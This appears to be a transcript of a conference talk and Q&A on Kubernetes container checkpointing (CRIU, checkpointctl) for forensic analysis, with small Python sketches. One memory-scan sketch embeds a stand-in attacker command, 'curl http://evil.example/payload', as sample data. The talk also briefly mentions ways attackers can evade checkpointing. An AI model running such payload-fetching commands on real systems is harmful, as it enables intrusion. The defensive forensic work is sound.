Hello everyone. Today I'll be talking about our work with Adrian Reber on introducing container checkpointing in Kubernetes and how we can use it for forensic analysis. A few years back there was a talk at KubeCon introducing forensic container checkpointing, covering the tools that can be used in production to respond to security incidents and how these tools can be used with containers. One thing mentioned during that talk was that containers don't support snapshotting; at the time this was still under development, and we have recently introduced a new feature in Kubernetes that allows you to take a checkpoint of a container. In this talk I will first briefly cover the security boundaries in Kubernetes and the threat models we are going to look into, then what container checkpointing is and how it works, how we can use it to perform forensic analysis, and finally the limitations and some future work. There are two main areas of security concern in Kubernetes: the configurable Kubernetes components themselves, and the applications running in the cluster. There are many components running on the control plane node that can be configured, and every node is also running a Kubernetes component called the kubelet that is important to secure. Namespaces are used for isolation between different tenants; pods introduce a security context between containers running on the cluster; and containers isolate applications from the host environment itself. In addition, every application has a different network namespace that isolates its communication, for example DNS. Kubernetes also makes secrets and tokens available to the application, and of course the application is processing sensitive data from users.
The three main threat models we are going to look into are these. First, an external attacker has network access to an application. The security controls commonly used here are encrypting all network traffic and using authentication and authorization for all APIs. Second, an attacker has compromised a container in the cluster, or has been able to use a malicious container image to run a malicious container on the cluster. In this case the attacker can try to escape the container or perform privilege escalation to take over the whole cluster, and the common security controls are limiting the privileges available to containers, limiting access to the kubelet running on the node, preventing applications running in containers from loading kernel modules, and restricting what network access the applications have. The third threat model is when an attacker has been able to, for example, steal the keys for accessing the Kubernetes API server, so they would be able to create pods and containers in the cluster itself. Here the security controls are role-based access control, limiting what a Kubernetes user can do, and limiting the resource quotas that can be allocated to a single user. The problem is that real-time monitoring systems for Kubernetes don't currently support taking a snapshot of the applications running in a container and using it to analyze what happened during a security incident. Container checkpointing can capture and preserve this state, and it can be used to analyze what happened at a specific point in time, but we also need advanced tools to analyze that state. So how do we enable container checkpointing, and how do we use it?
Multiple pods can run on a cluster node, every pod can have multiple containers inside it, and every container has a process tree, essentially a set of running processes. When the container engine, in this case CRI-O, is invoked to perform a checkpoint, it calls the container runtime, in this case runc, and runc calls CRIU. CRIU creates a snapshot, essentially serializing the runtime state of all processes running within the container. This state can then be used to restore the container from the point in time when the checkpoint was created, but it can also be used to analyze which processes were running and which files or network sockets were open at that particular time. To enable checkpointing in Kubernetes, CRIU has to be installed on every Kubernetes node. The checkpointing feature was introduced in CRI-O version 1.25, and we currently have a pull request for containerd. CRI-O has to be started with the option enable_criu_support, and the ContainerCheckpoint feature gate has to be enabled for the kubelet. Once this is done, you can send a POST HTTP request to the kubelet API, specifying the namespace, the pod, and the container to be checkpointed. This creates a checkpoint, essentially a tar archive containing all the state of the container, in the default location /var/lib/kubelet/checkpoints, where you can inspect the state further. There is also some discussion about how to optimize the way we store checkpoints, because currently everything is stored in a single directory, and we want to limit the number of checkpoints created for a specific container, so that periodic checkpointing doesn't take up all the available disk space. For this we will probably create a subdirectory per pod; that will probably come in a future version of CRI-O or the kubelet.
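The request flow just described can be sketched as follows. The endpoint path and default archive location follow the kubelet checkpoint API (POST /checkpoint/{namespace}/{pod}/{container} on the kubelet port), but the node, namespace, pod, and container names here are made-up placeholders, and the exact archive file name pattern may differ between versions:

```python
# Sketch of the kubelet checkpoint request described above.
# Node/namespace/pod/container names are placeholders for illustration.

def checkpoint_url(node: str, namespace: str, pod: str, container: str) -> str:
    """Build the kubelet API URL used to trigger a container checkpoint."""
    # 10250 is the default kubelet port; the request must be authenticated.
    return f"https://{node}:10250/checkpoint/{namespace}/{pod}/{container}"

def checkpoint_archive_glob(namespace: str, pod: str, container: str) -> str:
    """Default location where the kubelet writes the resulting tar archive."""
    # The archive name includes a timestamp; the exact pattern may vary by version.
    return f"/var/lib/kubelet/checkpoints/checkpoint-{pod}_{namespace}-{container}-*.tar"

url = checkpoint_url("node1", "default", "webapp", "app")
# In practice you would send an authenticated POST, for example:
#   curl -sk -X POST --cert admin.crt --key admin.key "<url>"
```

The point of the sketch is simply that the checkpoint is triggered per container through the kubelet's own API, not through the API server, which is why node-level authorization comes up later in the Q&A.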
So I have a short demo of how this works. This Kubernetes cluster has just two nodes, and we have a pod running a PHP application. I have a shell script which implements a checkpoint command for kubectl, and it allows me to list the different containers and pods running on this node. In this case we have this pod with a single container called demo running inside it. The script sends the POST request that was shown on the slide, and this creates a checkpoint in the default directory. In this case we have two checkpoints, because I tested this before the talk to see if it works. We can use a tool we developed called checkpointctl to inspect the state, to see what is inside the checkpoint itself. This is a high-level overview showing the IP address of the container that was captured and the root diff size: these are the files that have been modified by the application running inside the container. We can see all these files, including deleted ones; essentially this is capturing the read-write layer on top of the container image that is used by the application. We can also see the checkpoint size and the timestamp of when the checkpoint was created. We recently introduced a feature that allows us to see the mount points, essentially what has been mounted inside the container, and the different processes, so we can see the process ID and the process name: a high-level overview of what is captured in the checkpoint. If we untar the content of the checkpoint, we can see all the files inside it; the image files that the checkpointing tool creates are in a subdirectory called checkpoint. Before that, I'll just show you the content: rootfs-diff.tar contains the files that have been modified in the container.
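To make the archive layout concrete, here is a small sketch that builds a fake checkpoint tar with a layout similar to the one just described (a checkpoint/ subdirectory holding the CRIU image files, plus rootfs-diff.tar for the modified read-write layer) and lists its members. The member names are illustrative stand-ins, not taken from a real checkpoint:

```python
import io
import tarfile

def list_members(tar_bytes: bytes) -> list[str]:
    """Return the sorted member names of a checkpoint tar archive."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        return sorted(tar.getnames())

# Build a fake checkpoint archive mimicking the layout described in the talk:
# CRIU image files under checkpoint/, modified files in rootfs-diff.tar.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    for name in ("checkpoint/pstree.img", "checkpoint/fdinfo-2.img", "rootfs-diff.tar"):
        data = b"placeholder"
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))

members = list_members(buf.getvalue())
```

The same listing approach works on a real archive pulled from /var/lib/kubelet/checkpoints, which is essentially what checkpointctl automates at a higher level.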
We can use a tool called crit, the checkpoint/restore image tool, to decode all the image files. This allows us to see the content of all the checkpoint images. What we are seeing here is the process tree image, which contains a list of all threads and processes, with the process identifier, the thread identifier, and additional information about what is actually running, what is included in the checkpoint. Here we also have something called ghost files, also known as invisible files. When a file has been deleted but there is still an open file descriptor for it, the file is also included in the checkpoint, so we can inspect the content of such files. This is also important if we decide to restore the application and see how it behaves, what actions it is going to perform. There are many different images, and we are currently developing tools to analyze the state of the checkpoint further. To go back to my presentation: the limitations. These are the three main limitations I'm going to focus on today. Kubernetes secrets are keys or tokens made available to applications running in a container so they can access resources, for example a database or other services in the cluster. When we create a checkpoint, since these are stored either in environment variables or in the memory of the application, they are also captured with the checkpoint. This means it is important to keep checkpoints secure, to prevent leaking sensitive data such as keys. In the case of live migration and fault tolerance, we would want to keep this information in the checkpoint, because we can use the checkpoints to recover the application from a failure or to move it to a different physical machine.
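The ghost-file situation can be reproduced in a few lines. This only demonstrates the underlying Linux semantics (a deleted file whose data remains reachable through a still-open descriptor, which is why CRIU must capture it), not CRIU itself:

```python
import os
import tempfile

# Create a temp file and keep its descriptor open.
fd, path = tempfile.mkstemp()
os.write(fd, b"still here")

os.unlink(path)               # the file is now deleted from the filesystem
assert not os.path.exists(path)

os.lseek(fd, 0, os.SEEK_SET)  # ...but the open descriptor still reaches the data
content = os.read(fd, 64)
os.close(fd)
```

A checkpoint taken between the unlink and the close has to include that data, which is exactly what CRIU's ghost files are.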
In the case of fast startup, we want to improve the startup time of applications by taking a checkpoint immediately after some index or data has been loaded into memory; starting the application from the checkpoint then improves the startup time. In this case, we don't want to keep secrets or passwords stored in memory, because we want to initialize every application instance with a different key. So we need techniques to remove this secret information from the checkpoint. Another limitation is that an attacker can perform actions that make it more difficult to understand what was actually happening in the container, for example mimicking the behavior of trusted processes, essentially using existing processes within the container, which makes it harder to understand what happened during the attack. An attacker can also perform a set of actions not related to the attack itself, which makes it more difficult for, for example, intrusion detection systems to detect the attack. And there are certain cases that CRIU doesn't support: certain system calls, certain network sockets, or nested namespaces. So if an attacker wants to prevent a checkpoint from being created, they could use these techniques to prevent it. Now, some future work. How can we use container checkpoints with intrusion detection systems, and how can this be used for preventing attacks? There are different aspects. One is to improve the visibility of tools such as Falco, to be able to see what is actually running in a container, but also to use this for forensic analysis after a security incident has occurred. Container checkpoints can also be used to detect certain actions and trigger an alarm.
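One conceivable shape for such a secret-removal technique is a pre-checkpoint signal: the application registers a handler that wipes secret material from memory, and the orchestrator sends that signal right before the checkpoint is taken. This is only a minimal sketch; the choice of SIGUSR1 and the in-process secrets dict are assumptions, not part of any actual implementation:

```python
import os
import signal

SECRETS = {"db_password": "hunter2"}  # placeholder secret material

def drop_secrets(signum, frame):
    """Clear secret material so it does not end up in the checkpoint image."""
    SECRETS.clear()

# Register the handler; the checkpointer would send this signal before dumping.
signal.signal(signal.SIGUSR1, drop_secrets)

# Simulate the pre-checkpoint notification by signaling ourselves.
os.kill(os.getpid(), signal.SIGUSR1)
```

After restore, the application would have to re-fetch or re-derive its secrets, which is also what makes this attractive for the fast-startup case, where every instance should start with a different key.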
A new restart policy could also be introduced for containers, to allow restarting from a checkpoint. Potential attacks that can be inspected with checkpoints are, for example, SQL injection: we can detect when certain behavior is happening in the container. It's the same with command-line execution, or when an attacker is using a file inclusion attack. And when a malicious container is running on the cluster, we can use container checkpoints to detect it, improve the monitoring of the system, and introduce security policies that would allow us to detect different incidents. Finally, I just want to mention the two groups of participants who are going to work on this project and have been contributing to this work. Thank you very much, and I'll be happy to answer any questions.

So this is something we have been discussing in the community: what would be the best approach of doing this? The way we discussed implementing it is to introduce signal handling, so we can send a signal to the application running in the container, and then the application has to drop the secrets. There is another project implementing checkpoint/restore for Java applications; they perform certain actions before the checkpoint and certain actions after the checkpoint, which can help with this as well. So a signal is sent, and triggering the Kubernetes checkpoint will trigger this inside the Java application. But it's still in development, still something we are working on.

Yes. So, just to repeat the question: can we have a log that would list all the checkpoints, and then use the checkpoints after an incident has occurred? Yes.
A checkpoint allows you not only to see what was happening in the container; for example, if an attacker runs something entirely in memory without touching the disk, which is something that is commonly done today, you can use memory forensics, essentially look at the memory content inside the checkpoint, and understand what the attack was.

Yes. The question was how much overhead checkpointing has, in terms of how much disk space a checkpoint takes once it's created, compared to the size of the container, and how much data CRIU generates. CRIU is very optimized. The way it works is to use the ptrace system call to enter the address space of the process, then create a UNIX socket to the CRIU process running outside, and use splice, which avoids copying the memory from the process into a set of files. So it's very efficient, but of course it depends on, for example, how much memory the container uses, because we have to save all of this state.

Yes. The question was that you need certain permissions to create a checkpoint, so can someone with fewer permissions, for example a viewer role, do the same? At the moment I think you need admin permissions; essentially you're sending an HTTP request to the kubelet running on the node, so you need to be authorized to perform the checkpoint. But if you can create a checkpoint of a container, then you have access to all the memory of that container, so it has to require admin privileges.

Yes. Can we checkpoint containers one after the other? Was that your question? Yes. This is actually something we're working on: how we can synchronize the checkpoints between different containers.
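As a toy illustration of the memory-forensics idea mentioned above, the sketch below scans a byte blob standing in for dumped process memory and reports where an indicator of compromise occurs. Real checkpoints keep memory in CRIU's pages-*.img files; the indicator string and the dump here are invented:

```python
def find_indicator(memory: bytes, indicator: bytes) -> list[int]:
    """Return all byte offsets where the indicator occurs in a memory dump."""
    offsets, start = [], 0
    while (pos := memory.find(indicator, start)) != -1:
        offsets.append(pos)
        start = pos + 1
    return offsets

# Stand-in for a dumped memory region of a compromised process:
# 32 zero bytes of padding, then a command line left behind in memory.
dump = b"\x00" * 32 + b"curl http://evil.example/payload" + b"\x00" * 16
hits = find_indicator(dump, b"evil.example")
```

Even this naive scan catches the fileless case the answer describes: the command never touched disk, but its traces survive in the checkpointed memory.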
We are introducing a synchronization mechanism that allows creating checkpoints of two containers at the same time or, if these containers are running on different nodes, synchronizing the checkpoint across the different containers. This is useful if you have a distributed application running on multiple nodes in the cluster. Thank you. Thank you everyone.